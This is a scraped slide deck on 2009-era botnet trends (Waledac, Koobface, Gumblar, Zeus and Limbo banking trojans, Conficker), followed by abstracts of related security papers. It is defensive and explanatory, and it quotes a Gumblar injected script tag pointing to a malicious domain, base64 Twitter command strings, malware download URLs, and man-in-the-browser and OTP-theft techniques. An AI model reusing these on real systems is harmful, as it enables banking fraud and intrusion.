DOCSLIB.ORG

Cyber Attack Trend and Botnet

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
Cyber Attack Trend and Botnet Cyber Attack Trend and Botnet S.C. Leung CISSP CISA CBCP Agenda Botnet and Cyber Attack Trends Botnet Attack Trends Commercialization of Cyber Crime Professionalization of Cyber Crimeware Social Engineering always cool – Waledac botnet Following the Social Network Services – Koobface botnet Delivering via Web attack & Search Engine – Gumblar botnet Following the Money – Banking Trojans like Zeus botnet Building the Survival Kit – Conficker botnet Defending against Botnet Page . 2 Botnet (roBot Network) = infrastructure of controlled victim computers (bots) Up: Data Bot Herder Bot Herder Down: Command/Update C&C C&C C&C Up: Data Down: Command/Update bot bot bot bot bot bot bot Spam, DDoS attack Malware victim victim Phishing Page . 3 1. Commercialization of Cyber Crime Product and Service Delivery for Profit . What do attackers want now? . What are their product and services? – Products • Personal credentials, CCN, SSN, software CD keys • Tools to exploit, tools to hide malware – Service subscription: • spam, phishing, DDoS • botnet (76services.com now closed) Page . 5 2. Professionalization of Cyber Crimeware Professionalization of Cyber Crimeware . Division of Labour, R&D and Outsourcing . Botnet is a sign of maturity of the . Malware development, Botnet optimization infrastructure for – Malware good at detection evasion underground economy – Malware targeting identifying and terminating security software – Service delivery – Multi-language support – Maintenance – Remote administration support – Long term control – Signing and encryption . IT Infrastructure – Hosting – network, web hosting at hacker friendly environment • where there is great bandwidth • where legislation is lax • where user awareness is low – Domain - registration, domain hosting • where take down procedure is lengthy Page . 7 3. Social Engineering always cool Waledac Botnet Waledac Botnet . Spreading by – Spam emails employ social engineering extensively • contain link to iFrame embedded malicious website, tricking user to install the malware . Author = Creator of Storm botnet (which overwhelmed the Internet back in 2007) . Has sound infrastructure uses Nginx web server uses Double Fast Flux DNS The DNS records are changing all the time The DNS servers are changing all the time Page . 9 Waledac – Fast-flux Bot hosts can be dynamically assigned in real time Page . 10 Waledac theme – eCard social engineering – follow the talks of the town postcard.exe Page . 11 Waledac Themes social engineering – follow the talks of the town “Terrorist Attack”“SMS Spy “Independence themeon your Day”Partner” Play Page . 12 Waledac Service and Feature . Impact – open a back door on the compromised computer – steal personal information – spam contacts in address book – turn zombie into web server, web proxy, DNS and spam template relays . Major web server service – Pharmacy – serving malware Page . 13 4. Following the Social Network Services Koobface (koob-face) . A worm spreading in Facebook, MySpace, Twitter, Friendster, hi5 & Bebo . Spreading – Spoof a friend and send a message ““Hello; You must see it!!! LOL” with a URL – URL brings user to a fake YouTube site, luring to install a file “Flash_update.exe” – Upon execution, victim is infected. Impact – Poison all user search (Google, Ask, Yahoo and Bing) to malicious site http://www.f-secure.com/weblog/archives/00001517.html Page . 15 Koobface: Twitter campaign . Infected PCs with Koobface sent out Tweets with malicious URL Page . 16 A Botnet uses Twitter as Command Channel . Bots subscribe to RSS feed to get command . A Tweet like this – “aHR0cDovL2JpdC5seS9SNlNUViAgaHR0cDovL2JpdC5seS8yS 29Ibw==“ . Base64 decode the tweet, we got 2 tiny URLs – http://bit.ly/R6STV http://bit.ly/2KoHo . The bit.ly tiny URLs translated to: – http://pastebin.com/pastebin.php?dl=m5222dc70 http://paste.debian.net/43529/download/43529 – URLs are encoded file. When decoded and unzipped, giving malware files which were found to be poorly detected by VirusTotal as malware Page . 17 5. Delivering via Web attack & Search Engine Gumblar Botnet Gumblar Botnet: Impact . Web site is a delivery channel of malware – Gumblar steal FTP credentials and upload malware to 3000 legitimate web sites – Botnet connect to two domains for download: “gumblar.cn” / “martuz.cn” . Two Botnets formed: one for web sites and one for infected client PCs . Impacts – Client PCs: install backdoor in victims’ computers that connect to C&C • steal FTP credentials from the victims’ computers • Man in the browser attack: monitor traffic to and from the browser: –Replace Google search results with links pointing to malicious websites – Redirect from e-commerce or banking site to phishing web sites – Web sites: compromise any websites owned or operated by the victims • distribute malware which exploit Acrobat Reader & Flash Player vulnerabilities Page . 19 Gumblar Botnet: Obfuscation . Web pages injected obfuscated scripts, which vary from site to site, or page to page Malzilla <script src=//martus.cn/vid/?id=j></script> Page . 20 Gumblar Botnet: Detection and Take down . Blocking – block the two C&C sites: “gumblar.cn” and “martuz.cn” . Checking (not 100% accurate) – http://www.unmaskparasites.com/security-report/ Page . 21 6. Following the Money Botnet targeting Banks . What I have seen on a Zeus Botnet C&C Management interface – Bot administration features: • Screenshot (save to html without image) • Fake redirect (redirect to a prepared fake bank webpage) • Html inject (hijack the login session and inject new field) : • Log the visiting information of each banking site, record the input string (text or post URL) •An unknown field (table: yes/no) found with syntax: nn:nnnnnnnn – if the value is yes, mostly with comment, the comment logged the a/c information, e.g. transfer limit. Page . 23 Fake Redirect login page Source: Computer Associate Page . 24 Man-in-the-Browser Hacker’s ideal operation . Intercept transaction . Change amount and change destination to attacker account and send to the bank . Change the display to user as if his transaction was executed – Calculate the “should be amount” and rewrites the remaining total to screen Source: www.cronto.com Page . 25 Man in the Browser (MITB) . Install software/plugin inside the browser . Hooking key OS and web browser APIs and proxying data . Advantage – No encryption barrier as in proxy Web App – SSL Padlock is unaffected for modified content – Direct access to Data MITB • Freely alter the web page displayed to the customer • Freely modify the requests sent back to the bank. – Direct interface to web browser & application : • Can create additional commands (GET/POST/PUT) : – Extremely stealthy • Client hard to detect, since network is not interfered, web address, digital certificates are all correct Winsock • Bank sees the customer real IP address – Faster real time response so can break 2FA Page . 26 Limbo 2 - HTML Injection . Limbo 2 Trojan kit . Some variants inject fake fields into the online banking forms that the browser displays to the user. The additional fields are designed to collect details to help an attacker to impersonate the victim and/or compromise victim's account What is the use of getting the additional info? Source: ThreatExpert Page . 27 Inserting transaction (when login) . Login Shadow Login Trojan kick up shadow login at the back PIN + OTP PIN + OTP Submit Insert a new window PIN + OTP2 Hacker use OTP2 Submit “Not successful. to authenticate a Please retry” transaction Page . 28 HKMA Circular 2009-07-13 . The HKMA noticed that the recent fraudulent technique adopted by fraudsters is believed to involve infecting the customer's personal computer (PC) with Trojan horse programs to hijack the Internet banking login credentials of customers (including one-time passwords for two-factor authentication) during the Internet banking login process. The hijacked login credentials were used by the fraudsters to conduct high-risk Internet banking transactions such as making fund transfer to an unregistered third-party account. Page . 29 7. Building the Survival Kit Conficker Botnet Conficker - Propagation Mechanism Page . 31 Source: Cisco 2009 MidYear Report Conficker – a model for sustainable botnet . Designed to survive in disaster - What if the C&C are taken down? – Conficker.B - Domain generation for malware update • Active since Nov 2008, generating 250 domains/day in 5 TLDs for update – Conficker’s natural predator: the Conficker Working Group • Alliance of ICANN, domain registries and IT industry worked together to pre-empt Conficker – Pre-register domains – Redirect traffic to sinkholes to study the behavious – Conficker.C improved • Starting Apr 1, 2009, generating 50,000 domains/day in 116 TLDs; uses 500 in random (Some are existing domains) making it harder to preempt the domains • improved authentication and encryption so you cannot infiltrate into Conficker.C botnet easily • uses P2P for update as well – peers can update each other with the right authentication • Blocks more security vendors web site Page . 32 Collaborative Effort Works! . Conficker Working Group lead a concerted effort (www.confickerworkinggroup.org) – ICANN organized all registries to pre-empt the registration, No infection handle affected domains – Researches generated the list of generated domain and affected domains to provide transparency – Some worked out an EyeChart for easy detection – Security vendors developed detection and removal tools Conficker.C . HKIRC, HKCERT, Police and OGCIO – Check affected domains in April
Load more

Recommended publications
  • Botnets, Cybercrime, and Cyberterrorism: Vulnerabilities and Policy Issues for Congress
    Order Code RL32114 Botnets, Cybercrime, and Cyberterrorism: Vulnerabilities and Policy Issues for Congress Updated January 29, 2008 Clay Wilson Specialist in Technology and National Security Foreign Affairs, Defense, and Trade Division Botnets, Cybercrime, and Cyberterrorism: Vulnerabilities and Policy Issues for Congress Summary Cybercrime is becoming more organized and established as a transnational business. High technology online skills are now available for rent to a variety of customers, possibly including nation states, or individuals and groups that could secretly represent terrorist groups. The increased use of automated attack tools by cybercriminals has overwhelmed some current methodologies used for tracking Internet cyberattacks, and vulnerabilities of the U.S. critical infrastructure, which are acknowledged openly in publications, could possibly attract cyberattacks to extort money, or damage the U.S. economy to affect national security. In April and May 2007, NATO and the United States sent computer security experts to Estonia to help that nation recover from cyberattacks directed against government computer systems, and to analyze the methods used and determine the source of the attacks.1 Some security experts suspect that political protestors may have rented the services of cybercriminals, possibly a large network of infected PCs, called a “botnet,” to help disrupt the computer systems of the Estonian government. DOD officials have also indicated that similar cyberattacks from individuals and countries targeting economic,
    [Show full text]
  • A the Hacker
    A The Hacker Madame Curie once said “En science, nous devons nous int´eresser aux choses, non aux personnes [In science, we should be interested in things, not in people].” Things, however, have since changed, and today we have to be interested not just in the facts of computer security and crime, but in the people who perpetrate these acts. Hence this discussion of hackers. Over the centuries, the term “hacker” has referred to various activities. We are familiar with usages such as “a carpenter hacking wood with an ax” and “a butcher hacking meat with a cleaver,” but it seems that the modern, computer-related form of this term originated in the many pranks and practi- cal jokes perpetrated by students at MIT in the 1960s. As an example of the many meanings assigned to this term, see [Schneier 04] which, among much other information, explains why Galileo was a hacker but Aristotle wasn’t. A hack is a person lacking talent or ability, as in a “hack writer.” Hack as a verb is used in contexts such as “hack the media,” “hack your brain,” and “hack your reputation.” Recently, it has also come to mean either a kludge, or the opposite of a kludge, as in a clever or elegant solution to a difficult problem. A hack also means a simple but often inelegant solution or technique. The following tentative definitions are quoted from the jargon file ([jargon 04], edited by Eric S. Raymond): 1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary.
    [Show full text]
  • Fortinet's March Threatscape Report Shows Domination of Ransomware and Troublesome Zero-Day
    Fortinet's March Threatscape Report Shows Domination of Ransomware and Troublesome Zero-Day Rise of Ransomware Is Primarily Driven by Bredolab and Pushdo Botnets SUNNYVALE, CA, Apr 01, 2010 (MARKETWIRE via COMTEX News Network) -- Fortinet(R) (NASDAQ: FTNT) -- a leading network security provider and worldwide leader of unified threat management (UTM) solutions -- today announced its March 2010 Threatscape report showed domination of ransomware threats with nine of the detections in the malware top ten list resulting in either scareware or ransomware infesting the victim's PC. Fortinet observed the primary drivers behind these threats to be two of the most notorious botnet "loaders" -- Bredolab and Pushdo. Another important finding is the aggressive entrance of a new zero-day threat in FortiGuard's top ten attack list, MS.IE.Userdata.Behavior.Code.Execution, which accounted for 25 percent of the detected activity last month. Key threat activities for the month of March include: -- SMS-based Ransomware High Activity: A new ransomware threat -- W32/DigiPog.EP -- appeared in Fortinet's top ten malware list. DigiPog is an SMS blocker using Russian language, locking out a system and aggressively killing off popular applications like Internet Explorer and Firefox until an appropriate code is entered into a field provided to the user. To obtain the code, a user must send an SMS message to the provided number, receiving a code in return. Upon execution, DigiPog registers the user's MAC address with its server. It is the first time that SMS-based ransomware enters Fortinet's top ten list, showing that the rise of ransomware is well on its way.
    [Show full text]
  • The Downadup Codex a Comprehensive Guide to the Threat’S Mechanics
    Security Response The Downadup Codex A comprehensive guide to the threat’s mechanics. Edition 2.0 Introduction Contents Introduction.............................................................1 Since its appearance in late-2008, the Downadup worm has become Editor’s Note............................................................5 one of the most wide-spread threats to hit the Internet for a number of Increase in exploit attempts against MS08-067.....6 years. A complex piece of malicious code, this threat was able to jump W32.Downadup infection statistics.........................8 certain network hurdles, hide in the shadows of network traffic, and New variants of W32.Downadup.B find new ways to propagate.........................................10 defend itself against attack with a deftness not often seen in today’s W32.Downadup and W32.Downadup.B threat landscape. Yet it contained few previously unseen features. What statistics................................................................12 set it apart was the sheer number of tricks it held up its sleeve. Peer-to-peer payload distribution...........................15 Geo-location, fingerprinting, and piracy...............17 It all started in late-October of 2008, we began to receive reports of A lock with no key..................................................19 Small improvements yield big returns..................21 targeted attacks taking advantage of an as-yet unknown vulnerability Attempts at smart network scanning...................23 in Window’s remote procedure call (RPC) service. Microsoft quickly Playing with Universal Plug and Play...................24 released an out-of-band security patch (MS08-067), going so far as to Locking itself out.................................................27 classify the update as “critical” for some operating systems—the high- A new Downadup variant?......................................29 Advanced crypto protection.................................30 est designation for a Microsoft Security Bulletin.
    [Show full text]
  • Post-Mortem of a Zombie: Conficker Cleanup After Six Years Hadi Asghari, Michael Ciere, and Michel J.G
    Post-Mortem of a Zombie: Conficker Cleanup After Six Years Hadi Asghari, Michael Ciere, and Michel J.G. van Eeten, Delft University of Technology https://www.usenix.org/conference/usenixsecurity15/technical-sessions/presentation/asghari This paper is included in the Proceedings of the 24th USENIX Security Symposium August 12–14, 2015 • Washington, D.C. ISBN 978-1-939133-11-3 Open access to the Proceedings of the 24th USENIX Security Symposium is sponsored by USENIX Post-Mortem of a Zombie: Conficker Cleanup After Six Years Hadi Asghari, Michael Ciere and Michel J.G. van Eeten Delft University of Technology Abstract more sophisticated C&C mechanisms that are increas- ingly resilient against takeover attempts [30]. Research on botnet mitigation has focused predomi- In pale contrast to this wealth of work stands the lim- nantly on methods to technically disrupt the command- ited research into the other side of botnet mitigation: and-control infrastructure. Much less is known about the cleanup of the infected machines of end users. Af- effectiveness of large-scale efforts to clean up infected ter a botnet is successfully sinkholed, the bots or zom- machines. We analyze longitudinal data from the sink- bies basically remain waiting for the attackers to find hole of Conficker, one the largest botnets ever seen, to as- a way to reconnect to them, update their binaries and sess the impact of what has been emerging as a best prac- move the machines out of the sinkhole. This happens tice: national anti-botnet initiatives that support large- with some regularity. The recent sinkholing attempt of scale cleanup of end user machines.
    [Show full text]
  • PC Anti-Virus Protection 2011
    PC Anti-Virus Protection 2011 12 POPULAR ANTI-VIRUS PROGRAMS COMPARED FOR EFFECTIVENESS Dennis Technology Labs, 03/08/2010 www.DennisTechnologyLabs.com This test aims to compare the effectiveness of the most recent releases of popular anti-virus software1. The products include those from Kaspersky, McAfee, Microsoft, Norton (Symantec) and Trend Micro, as well as free versions from Avast, AVG and Avira. Other products include those from BitDefender, ESET, G-Data and K7. The tests were conducted between 07/07/2010 and 22/07/2010 using the most up to date versions of the software available. A total of 12 products were exposed to genuine internet threats that real customers could have encountered during the test period. Crucially, this exposure was carried out in a realistic way, reflecting a customer’s experience as closely as possible. For example, each test system visited real, infected websites that significant numbers of internet users were encountering at the time of the test. These results reflect what would have happened if those users were using one of the seven products tested. EXECUTIVE SUMMARY Q Products that block attacks early tended to protect the system more fully The nature of web-based attacks means that the longer malware has access to a system, the more chances it has of downloading and installing further threats. Products that blocked the malicious and infected websites from the start reduced the risk of compromise by secondary and further downloads. Q 100 per cent protection is rare This test recorded an average protection rate of 87.5 per cent. New threats appear online frequently and it is inevitable that there will be times when specific security products are unable to protect from some of these threats.
    [Show full text]
  • Large-Scale Malware Experiments
    LARGE-SCALE MALWARE EXPERIMENTS ... CALVET ET AL. LARGE-SCALE MALWARE • Unlike with in-the-wild experiments [1], there are fewer ethical or legal issues to deal with than when performing EXPERIMENTS: WHY, HOW, AND arbitrary attacks against infected computers. SO WHAT? • Having an in vitro environment provides us with a way to Joan Calvet, Jose M. Fernandez conduct computer security research in a scientifi c way: we École Polytechnique de Montréal, Montréal, Canada can reproduce experiments and test the effect of various independent variables. Email {joan.calvet, jose.fernandez}@polymtl.ca We decided to use the Waledac botnet as a fi rst experiment for the following reasons: Pierre-Marc Bureau ESET, Montréal, Canada • Thanks to prior reverse engineering [2], we had in-depth knowledge of this threat family. Email [email protected] • This malware does not replicate, thus limiting the risk of running an experiment that might get out of control. Jean-Yves Marion LORIA, Nancy, France • There exists a set of vulnerabilities in Waledac’s peer-to- peer protocol that were worth investigating. We wanted to Email [email protected] evaluate the impact of a mitigation scheme against the botnet. ABSTRACT 1.1 The Waledac case study One of the most popular research areas in the anti-malware The architecture of the Waledac botnet is split into four layers. industry (second only to detection) is to document malware The fi rst layer contains infected hosts with private IP addresses characteristics and understand their operations. Most initiatives that are referred to as spammers. They are essentially the are based on reverse engineering of malicious binaries so as to ‘worker’ bots and constitute approximately 80% of the botnet.
    [Show full text]
  • The Botnet Chronicles a Journey to Infamy
    The Botnet Chronicles A Journey to Infamy Trend Micro, Incorporated Rik Ferguson Senior Security Advisor A Trend Micro White Paper I November 2010 The Botnet Chronicles A Journey to Infamy CONTENTS A Prelude to Evolution ....................................................................................................................4 The Botnet Saga Begins .................................................................................................................5 The Birth of Organized Crime .........................................................................................................7 The Security War Rages On ........................................................................................................... 8 Lost in the White Noise................................................................................................................. 10 Where Do We Go from Here? .......................................................................................................... 11 References ...................................................................................................................................... 12 2 WHITE PAPER I THE BOTNET CHRONICLES: A JOURNEY TO INFAMY The Botnet Chronicles A Journey to Infamy The botnet time line below shows a rundown of the botnets discussed in this white paper. Clicking each botnet’s name in blue will bring you to the page where it is described in more detail. To go back to the time line below from each page, click the ~ at the end of the section. 3 WHITE
    [Show full text]
  • CONTENTS in THIS ISSUE Fighting Malware and Spam
    MARCH 2008 Fighting malware and spam CONTENTS IN THIS ISSUE 2 COMMENT EVASIVE ACTION Home (page) renovations Pandex has attracted very little attention from the media and generated little 3 NEWS discussion between malware Botherders herded researchers and among the 29A folds general populace. Chandra Prakash and Adam Thomas provide an overview of the Pandex operation and take an in-depth look at VIRUS PREVALENCE TABLE 3 the underlying code that has allowed this malware to evade detection for so long. 4 MALWARE ANALYSIS page 4 Pandex: the botnet that could PACKING A PUNCH In the fi nal part of the series on exepacker 9 FEATURE blacklisting, Robert Neumann takes a look at how all the processing and analysis techniques are put Exepacker blacklisting part 3 into practice in a real-life situation. page 9 15 CONFERENCE REPORT AVG TURNS 8 Black Hat DC and CCC 24C3 John Hawes gets his hands on a preview version of the latest offering from AVG. 18 PRODUCT REVIEW page 18 AVG Internet Security 8 22 END NOTES & NEWS This month: anti-spam news and events, and Ken Simpson considers the implications of rising spam volume despite increasing accuracy of content fi lters. ISSN 1749-7027 COMMENT ‘It is hoped that within all sizes of business. It is hoped that the comment facility will promote discussion among visitors and that the comment facility in some cases the more knowledgeable of VB’s readers will promote will be able to guide and assist those less well versed in discussion among the complexities of anti-malware technologies.
    [Show full text]
  • MODELING the PROPAGATION of WORMS in NETWORKS: a SURVEY 943 in Section 2, Which Set the Stage for Later Sections
    942 IEEE COMMUNICATIONS SURVEYS & TUTORIALS, VOL. 16, NO. 2, SECOND QUARTER 2014 Modeling the Propagation of Worms in Networks: ASurvey Yini Wang, Sheng Wen, Yang Xiang, Senior Member, IEEE, and Wanlei Zhou, Senior Member, IEEE, Abstract—There are the two common means for propagating attacks account for 1/4 of the total threats in 2009 and nearly worms: scanning vulnerable computers in the network and 1/5 of the total threats in 2010. In order to prevent worms from spreading through topological neighbors. Modeling the propa- spreading into a large scale, researchers focus on modeling gation of worms can help us understand how worms spread and devise effective defense strategies. However, most previous their propagation and then, on the basis of it, investigate the researches either focus on their proposed work or pay attention optimized countermeasures. Similar to the research of some to exploring detection and defense system. Few of them gives a nature disasters, like earthquake and tsunami, the modeling comprehensive analysis in modeling the propagation of worms can help us understand and characterize the key properties of which is helpful for developing defense mechanism against their spreading. In this field, it is mandatory to guarantee the worms’ spreading. This paper presents a survey and comparison of worms’ propagation models according to two different spread- accuracy of the modeling before the derived countermeasures ing methods of worms. We first identify worms characteristics can be considered credible. In recent years, although a variety through their spreading behavior, and then classify various of models and algorithms have been proposed for modeling target discover techniques employed by them.
    [Show full text]
  • An Introduction to Malware
    Downloaded from orbit.dtu.dk on: Sep 24, 2021 An Introduction to Malware Sharp, Robin Publication date: 2017 Document Version Publisher's PDF, also known as Version of record Link back to DTU Orbit Citation (APA): Sharp, R. (2017). An Introduction to Malware. General rights Copyright and moral rights for the publications made accessible in the public portal are retained by the authors and/or other copyright owners and it is a condition of accessing publications that users recognise and abide by the legal requirements associated with these rights. Users may download and print one copy of any publication from the public portal for the purpose of private study or research. You may not further distribute the material or use it for any profit-making activity or commercial gain You may freely distribute the URL identifying the publication in the public portal If you believe that this document breaches copyright please contact us providing details, and we will remove access to the work immediately and investigate your claim. An Introduction to Malware Robin Sharp DTU Compute Spring 2017 Abstract These notes, written for use in DTU course 02233 on Network Security, give a short introduction to the topic of malware. The most important types of malware are described, together with their basic principles of operation and dissemination, and defenses against malware are discussed. Contents 1 Some Definitions............................2 2 Classification of Malware........................2 3 Vira..................................3 4 Worms................................
    [Show full text]
  • Iptrust Botnet / Malware Dictionary This List Shows the Most Common Botnet and Malware Variants Tracked by Iptrust
    ipTrust Botnet / Malware Dictionary This list shows the most common botnet and malware variants tracked by ipTrust. This is not intended to be an exhaustive list, since new threat intelligence is always being added into our global Reputation Engine. NAME DESCRIPTION Conficker A/B Conficker A/B is a downloader worm that is used to propagate additional malware. The original malware it was after was rogue AV - but the army's current focus is undefined. At this point it has no other purpose but to spread. Propagation methods include a Microsoft server service vulnerability (MS08-067) - weakly protected network shares - and removable devices like USB keys. Once on a machine, it will attach itself to current processes such as explorer.exe and search for other vulnerable machines across the network. Using a list of passwords and actively searching for legitimate usernames - the ... Mariposa Mariposa was first observed in May 2009 as an emerging botnet. Since then it has infected an ever- growing number of systems; currently, in the millions. Mariposa works by installing itself in a hidden location on the compromised system and injecting code into the critical process ͞ĞdžƉůŽƌĞƌ͘ĞdžĞ͘͟/ƚŝƐknown to affect all modern Windows versions, editing the registry to allow it to automatically start upon login. Additionally, there is a guard that prevents deletion while running, and it automatically restarts upon crash/restart of explorer.exe. In essence, Mariposa opens a backdoor on the compromised computer, which grants full shell access to ... Unknown A botnet is designated 'unknown' when it is first being tracked, or before it is given a publicly- known common name.
    [Show full text]